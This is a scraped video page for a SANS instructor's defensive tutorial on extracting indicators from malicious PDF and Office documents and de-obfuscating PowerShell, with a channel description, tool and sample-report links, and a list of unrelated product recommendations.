12 Days of Defense - Day 1: PDF and Office Doc Malware IOC Extraction
John Hubbard
View ChannelAbout
Looking to learn or improve your cyber defense skills? Want to know how to analyze network traffic, reverse engineer malware, triage phishing, analyze Windows or Linux logs and more? Thinking about starting a SOC analyst or blue team / IT security career? You’ve come to the right place! Hello! I’m John Hubbard and I’m a Sr. Instructor, course author, and curriculum lead for the Cyber Defense curriculum at the SANS Institute – the world’s most trusted source for cyber security training. I know how tough cyber security is to learn, and it’s an even tougher topic to stay up to date with! That’s why, on this channel, I break down complex cyber security concepts and make them clear and easy to understand. Effective cyber security training is my passion and my job, and through my videos, I hope to help you learn what you need to protect yourself and your organization from cyber-attacks. Twitter: @SecHubb In-person teaching schedule: https://www.sans.org/profiles/john-hubbard/
Video Description
In this video I show how to extract a malicious URL from a PDF without opening it, how to spot a weaponized Office document, and a method to quickly de-obfuscate PowerShell. Enjoy! Links: - REMnux: https://www.remnux.org - PDF: https://app.any.run/tasks/0bf96bc2-041b-4918-9440-4fce9b160ae7/# - Macro-enabled doc: https://hybrid-analysis.com/sample/0aee2350aab11b452b864426d7e7f5735b06ed55c09429f0e0ab38015b8771ee?environmentId=100 === My SANS Courses: - SEC450 - Blue Team Fundamentals: https://sans.org/sec450 - MGT551 - Building and Leading Security Operations Centers: https://sans.org/mgt551 PDF Guide to Security Operations: https://www.sans.org/security-resources/posters/cyber-defense/guide-security-operations-260 Blueprint Podcast: https://sans.org/blueprint-podcast Twitter: https://twitter.com/SecHubb
Essential Malware Analysis Tools
AI-recommended products based on this video
Lenovo IdeaPad 15.6” FHD Touchscreen Laptop, 40GB RAM 2.5TB Storage (2TB SSD+512GB Docking Station Set), 6-Cores Intel Core i3, Windows 11 Pro with Microsoft Office Included, Plusera Earphones
Lenovo 2025 New Touchscreen Laptop • 6-Cores Intel Core i3 • 40GB RAM • 2TB SSD • 15.6 inch FHD (1920 x 1080) Display • Long Battery Life • WOWPC Recovery USB • Windows 11 Pro with Microsoft Office
acer Nitro V 15 Gaming Laptop, 15.6" 144Hz FHD Display, Intel 10-Core i7-13620H, NVIDIA GeForce RTX 4060, 64 GB DDR5 RAM, 4 TB SSD, Backlit Keyboard, Microsoft Office Lifetime License, Windows 11 Pro
acer Nitro V16 Gaming Laptop, Microsoft Office 2024 Lifetime License, 16" WUXGA 165Hz, AMD Ryzen 7 8845HS Up to 5.10 GHz, GeForce RTX 4060, 64 GB DDR5 RAM, 4 TB SSD, Backlit Keyboard, Win 11 Pro
Wireless Bluetooth Mouse for Apple iPad iPhone MacBook Android Samsung Tablet Phone Dual-Mode Rechargeable 2.4G Portable Computer Mice for Windows Laptop Notebook PC Mac Desktop USB Receiver (Black)
UGREEN USB Bluetooth 5.3 Adapter for PC, Plug & Play for Windows 11/10/8.1, Bluetooth Receiver & Transmitter for Keyboard/Mouse/Headphone/Speakers/Printer
BISSELL® Steam Shot™ OmniReach handheld portable steam cleaner for tile, grout, windows, bathrooms, kitchens, fabric steaming tool, includes 10 tools
UGREEN Cat 8 Ethernet Cable 10FT, High Speed Braided 40Gbps 2000Mhz Network Cord Cat8 RJ45 Shielded Indoor Heavy Duty LAN Cables Compatible for Gaming PC PS5 Xbox Modem Router 10FT
